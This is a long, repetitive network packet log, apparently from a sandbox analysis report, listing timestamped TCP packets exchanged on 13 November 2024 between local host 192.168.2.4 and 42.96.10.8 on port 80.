                                                                                                                                                                                                            Nov 13, 2024 13:25:22.928670883 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.928697109 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.928710938 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.928723097 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.928739071 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.928741932 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.928761005 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.928776026 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.928833961 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.928859949 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.928913116 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.929943085 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.929960966 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.929976940 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.930038929 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.930044889 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.930054903 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.930064917 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.930082083 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.930097103 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.930114031 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.930157900 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.930157900 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.936753988 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.936768055 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.936837912 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.936846018 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.936867952 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.936888933 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.936914921 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.936928988 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.936928988 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.936942101 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.936958075 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.936975956 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.936990023 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.937017918 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.937019110 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.937019110 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.937033892 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.937051058 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.937066078 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.937088013 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.937088013 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.937096119 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.937113047 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.937129021 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.937144041 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.937145948 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.937161922 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.937179089 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.937179089 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.937196016 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.937211037 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.937261105 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.937269926 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.937287092 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.937314034 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.937330008 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.937346935 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.937351942 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.937361002 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.937378883 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.937386990 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.937403917 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.937418938 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.937434912 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.937450886 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.937484026 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.937484026 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.937488079 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.937505007 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.937520027 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.937536001 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.937553883 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.937553883 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.937561035 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.937577009 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.937603951 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.937618017 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.937618971 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.937637091 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.937645912 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.937653065 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.937680006 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.937699080 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.937716007 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.937732935 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.937757969 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.937771082 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.937771082 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.937776089 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.937803030 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.937818050 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.937834024 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.937849998 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.937854052 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.937854052 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.937865019 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.937880993 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.937891006 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.937895060 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.937912941 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.937928915 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.937939882 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.937954903 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.937958956 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.937975883 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.937989950 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.938015938 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.938029051 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.938029051 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.938034058 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.938050032 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.938065052 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.938091040 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.938097954 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.938097954 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.938107967 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.938122988 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.938138962 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.938152075 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.938153028 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.938172102 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.938184023 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.938213110 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.938226938 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.938245058 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.938260078 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.938275099 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.938292980 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.938297033 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.938311100 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.938333988 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.938353062 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.938353062 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.938353062 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.938368082 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.938386917 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.938411951 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.938411951 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.938426018 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.938430071 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.938446045 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.938462019 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.938479900 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.938492060 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.938492060 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.938494921 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.938637018 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.938652039 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.938668013 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.938678980 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.938713074 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.938713074 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.938730001 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.938759089 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.938775063 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.938788891 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.938791990 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.938791990 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.938812017 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.938826084 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.938842058 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.938859940 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.938862085 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.938862085 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.938873053 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.938910007 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.938929081 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.938965082 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.938966990 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.938981056 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.938997984 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.939060926 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.939074039 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.939088106 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.939117908 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.939141989 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.939183950 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.939210892 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.939227104 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.939243078 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.939258099 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.939280987 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.939285040 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.939301968 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.939306021 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.939337015 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.939349890 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.939378977 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.939399004 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.939471960 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.939618111 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.939632893 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.939650059 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.939665079 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.939666033 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.939682007 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.939697981 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.939713955 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.939727068 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.939727068 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.939739943 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.939752102 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.939758062 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.939773083 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.939790964 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.939821005 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.939827919 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.939837933 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.939853907 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.939857960 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.939878941 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.939896107 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.939908981 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.939908981 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.939912081 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.939929008 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.939943075 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.939958096 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.939959049 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.939974070 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.939986944 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.939990997 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.940012932 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.940028906 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.940043926 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.940046072 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.940061092 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.940074921 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.940077066 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.940077066 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.940092087 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.940108061 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.940133095 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.940136909 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.940148115 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.940150976 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.940165043 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.940181017 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.940196037 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.940198898 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.940212011 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.940229893 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.940244913 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.940260887 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.940262079 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.940262079 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.940329075 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.940468073 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.940484047 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.940499067 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.940515995 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.940517902 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.940531969 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.940542936 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.940547943 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.940566063 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.940591097 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.940602064 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.940602064 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.940608025 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.940625906 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.940639973 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.940660000 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.940664053 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.940681934 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.940696955 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.940712929 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.940730095 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.940730095 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.940740108 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.940757036 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.940773010 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.940793991 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.940793991 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.940793991 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.940813065 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.940829039 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.940844059 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.940861940 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.940861940 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.940867901 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.940895081 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.940907955 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.940922022 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.940948963 CET804973342.96.10.8192.168.2.4
